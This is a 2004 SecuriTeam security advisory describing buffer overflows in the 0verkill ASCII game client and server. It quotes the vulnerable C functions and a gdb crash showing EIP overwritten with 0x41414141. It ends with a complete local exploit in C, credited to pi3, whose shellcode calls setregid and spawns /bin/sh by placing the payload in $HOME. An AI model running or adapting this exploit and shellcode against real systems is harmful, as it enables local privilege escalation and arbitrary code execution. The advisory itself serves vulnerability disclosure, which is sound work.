Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Home  Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key). Confidence 2013 5% Off any SANS course Use Code: SecuriTeam_5 Hack In Paris La Nuit du Hack Subjects of Interest: Vulnerability Management SQL Injection Buffer Overflows Active Network Scanning Fuzzing Fuzzer Report Network Security Network Scanner Pen Testing Security Scanner	0verkill Buffer Overflow Vulnerabilities 2 Feb. 2004    Summary 0verkill is "a bloody 2D action deathmatch-like game in ASCII-ART running under Linux, OS/2 and Windows." Several buffer overflow conditions exist both in the 0verkill server and client, which would allow execution of arbitrary code.   Credit: The information has been provided by Adam Zabrocki Free Website Security Scan Free Fuzzer Report Vulnerability Assessment Detect web app vulnerabilities University study comparing the top Accurate and automated scanning Get guidance from professionals. 6 commercially availble fuzzers. for networks of any size.    Details Protect your website! Free Trial, Nothing to install. No interruption of visitors. www.beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * 0verkill version 0.15pre3 and prior Immune Systems:  * 0verkill version 0.16 Client Vulnerabilities Buffer overflows exist in two functions in the client code, possibly three. In the load_cfg() and save_cfg() functions: void load_cfg(char *host,char *name,int *color) { ... ...     unsigned char txt[256]; #ifndef WIN32     sprintf(txt,"%s/%s",getenv("HOME"),CFG_FILE);  //  first overflow #else     sprintf(txt,"./%s",CFG_FILE); #endif ... ...     a=strlen(txt); ... ...     memcpy(host,txt,strlen(txt)+1);         //  second overflow ... ...     a=strlen(txt); ... ...     memcpy(name,txt,strlen(txt)+1);         //  third overflow ... ... } Compiling 0verkill on a platform other than Windows and setting a long $HOME environment variable demonstrates the buffer overflow, like so: $ export HOME=`perl - e 'print "A"x300'` $ gdb ./0verkill GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License,  and you are welcome to change it and/or distribute copies of it under  certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty"  for details. This GDB was configured as "i386-slackware-linux"... (gdb) r Starting program: /root/root/all/gry/0verkill/./0verkill Program received signal SIGSEGV, Segmentation fault. 0x41414141 in  () (gdb) i r eip eip      0x41414141    0x41414141 (gdb) void save_cfg(char *host,char *name,int color) { ... ...     unsigned char txt[256]; #ifndef WIN32     sprintf(txt,"%s/%s",getenv("HOME"),CFG_FILE);  //  overflow #else     sprintf(txt,"./%s",CFG_FILE); #endif ... ... } Technically the same type of bug is present in both functions. Improper bounds checking when reading the $HOME environment variable. The third possible vulnerability is in the send_message() function which is called from play(): void play(void) { ... ...     char string[80]; ... ...         if (chat) {         ...         ...                 case 1:         char 0;                 send_message(string); ... ... } ... ... } While MAX_MESSAGE_LENGTH is defined in the cfg.h file to be: #define MAX_MESSAGE_LENGTH 70 /* maximal length of chat message Since a string passed to the send_message() function could be larger than the maximum message size there might be a way to exploit this vulnerability or to otherwise crash the program. Server Vulnerabilities A server, when compiled under Windows, contains a vulnerability when copying the username into a buffer, presented in the following code from the parse_command_line() function: void parse_command_line(int argc,char **argv) {     int a; ... #ifdef WIN32         a=getopt(argc,argv,"hl:np:ri:Ic"); ... ... #endif         switch(a) { ... ... #ifdef WIN32 ... ...             case 'i': {   /* install service */                 char  username[80],                     *pass=NULL; ... ...                     if ( (pass=strchr (optarg, '/'))==NULL ) {                         strcpy(username,  optarg);                         memcpy(username,  optarg, sizeof(username)-1); ... ... } By using the strcpy() function in such an unsafe manner it is possible to create a buffer overflow condition. With GetLastErrorText() it might be possible to create a buffer overflow condition but the author was unable to exploit it. LPTSTR GetLastErrorText(LPTSTR lpszBuf, DWORD dwSize) { ...     LPTSTR lpszTemp=NULL; ... ...     dwRet=FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER |  FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_ARGUMENT_ARRAY, NULL,         globErr, LANG_NEUTRAL, (LPTSTR)&lpszTemp, 0,  NULL); ... ...         sprintf(lpszBuf, ": %u: %s", globErr,  lpszTemp); // there :P ... ... } A simple exploit code is presented below: /* * Simple local exploit for 0verkill by pi3 (pi3ki31ny) * Greetz: [greetz on my web] && other my friends (you know who  you are) * *     ...::: -=[ www.pi3.int.pl ]=- :::... */ #include < stdio.h> #include < stdlib.h> #include < string.h> #include < unistd.h> #include < getopt.h> #define PATH "./0verkill" #define BUFS 300 /*  ...::: -=[ www.pi3.int.pl ]=- :::...  */ char shellcode[] = "\x31\xdb\x31\xc0\x31\xd2\xb2\x2d\x6a\x0a\x68 \x3a"          "\x2e\x2e\x2e\x68\x2d\x20\x3a\x3a\x68\x6c\x20 \x5d"          "\x3d\x68\x6e\x74\x2e\x70\x68\x69\x33\x2e\x69 \x68"          "\x77\x77\x2e\x70\x68\x3d\x5b\x20\x77\x68 \x3a\x3a"          "\x20\x2d\x68\x2e\x2e\x2e\x3a\x89\xe1\xb0\x04 \xcd"          "\x80" /*  setregid (20,20)  */          "\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0 \x47"   "\xcd\x80" /*  exec /bin/sh  */          "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62 \x69"          "\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0 \x0b\xcd"          "\x80" /*  exit(0)  */          "\x31\xdb\x89\xd8\xb0\x01\xcd\x80"; long ret_ad(char *a1, char *a2) {    return (0xbffffffa-strlen(a1)-strlen(a2)); } int ussage(char *arg) {    printf("\n\t...::: -=[ Simple exploit for 0verkill (by pi3) ] =- :::...\n");  printf("\n\tUssage:\n\t[+] %s [options]\n   - < this help screen>   -o < offset>   -p PATH\n\n",arg);  exit(-1); } int main(int argc, char *argv[]) {    long ret,*buf_addr;  char *buf,*path=PATH;  int i,opt,offset=0;  FILE *fp;    while((opt = getopt(argc,argv,"p:o:")) != -1) {  switch(opt) {      case 'o':   offset=atoi(optarg);   break;     case 'p':      path=optarg;   break;     case '':  default:      ussage(argv[0]);   break;  }  }    if ( (fp=fopen(path,"r"))==NULL) {    printf("\n*\tI can\'t open path to victim! - % s\t*\n\n",path);    ussage(argv[0]);  } fclose(fp);    if (!(buf=(char*)malloc(BUFS))) {    printf("\nI can\'t locate memory! - buf\n");    exit(-1);  }    printf("\n\t...::: -=[ Simple exploit for 0verkill (by pi3) ] =- :::...\n");  printf("\n\t[+] Bulding buffors!\n");  ret=ret_ad(shellcode,path);  ret+=offset;    printf("\t[+] Using adres 0x%x\n",ret);    buf_addr=(long*)buf;    for(i=0;i< BUFS;i+=4) {   *(buf_addr) = ret; buf_addr++;  }  memcpy(buf, shellcode, strlen(shellcode));     printf("\nExecuting the vuln program - %s\n\n",path);  setenv("HOME", buf, 1);  execl(path,path, 0);  return 0; }  Comments: blog comments powered by Disqus	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles Moodle WebDav Repository Plaintext Password Disclosure Vulnerability QuickShare File Share Directory Traversal Vulnerability ELinks Security Bypass Vulnerability BlazeDVD PLF Exploit DEP/ASLR Bypass (MSF) Vulnerability Siemens SIMATIC WinCC CCEServer Crafted Packet Handling Remote Overflow DoS Vulnerability Qool CMS /Qoolrc2/admin/addusergroup Title Parameter XSS Vulnerability Oracle Java SE JVM Specification Implementation Weakness Vulnerability OpenFabrics ibutils Multiple File Symlink Arbitrary File Overwrite Vulnerability Linux Kernel llc Subsystem getsockname() Function Stack Memory Local Disclosure Vulnerability GroundWork Monitor Enterprise Performance Component SSI Injection Arbitrary Command Execution Vulnerability GroundWork Monitor Enterprise Monarch (XXE) Arbitrary File Manipulation Vulnerability Google Chrome Printing Handling Use-after-free Issue Vulnerability Google Chrome Cross-Origin HTTP Basic Authentication Prompt Blocking Brute Force Bypass Vulnerability Google Android Cross-Application Native Code Manipulation Privilege Escalation Vulnerability Draytek Vigor3900 sh draytekv3900 Command Handling Authentication Bypass Vulnerability Counter Per Day Plugin For WordPress Notes.php Malformed Requests Remote DoS Vulnerability ClipShare /siteadmin/login.php Plaintext Password Disclosure Vulnerability Cisco IOS Software Internet Key Exchange (IKE) Feature Memory Leak Remote DoS Vulnerability Bookyt Unspecified Remote Code Execution Vulnerability Apple Mac OS X Apache Unicode Character URI Handling Authentication Bypass Vulnerability  Featured Articles HP LaserJet Pro Printers Remote Data Access Vulnerability Mozilla Multiple Product HTML Editor Function Use-after-free Arbitrary Code Execution Vulnerability Exim with Dovecot Typical Misconfiguration Leads to Remote Command Execution Vulnerability IBM InfoSphere Information Server Unspecified Arbitrary Site Redirect Vulnerability Cisco Unity Express /Web/SA2/ScriptList.do gui_pagenotableData Parameter XSS Vulnerability Supportworks ITSM SQL Injection Vulnerability WirelessFiles for iPad/iPhone Multiple File Extension Upload Arbitrary Script Code Execution Vulnerability IBM InfoSphere Information Server Import Export Manager Path Subversion Arbitrary DLL Injection Code Execution Vulnerability CommentLuv Plugin for WordPress /wp-admin/admin-ajax.php _ajax_nonce Parameter XSS Vulnerability ownCloud Multiple Script Multiple Administrator Action CSRF Vulnerability IBM Multiple Product XSS Vulnerability TLS / DTLS Protocol CBC-Mode Ciphersuite Distinguishing Attack Information Disclosure Weakness Vulnerability JBoss Enterprise Application Platform / JBoss Enterprise Web Platform JMX Invoker Roll Restriction Weakness Vulnerability Google AD Sync Tool Exposure Of Sensitive Information Vulnerability VMware Multiple Product vmci.sys VMCI Control Code Handling Local Privilege Escalation Vulnerability Cisco Unity Express /Web/SA/SaveConfiguration.do Multiple Action CSRF Vulnerability AdPeeps /adpeeps_servlet.php Bannertext Parameter XSS Vulnerability Oracle Application Framework Diagnostic Mode Bypass Vulnerability Nero MediaHome NMMediaServer.dll Long Request Line Off-By-One Overflow Vulnerability Samba Samba Web Administration Tool (SWAT) Manipulation CSRF Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®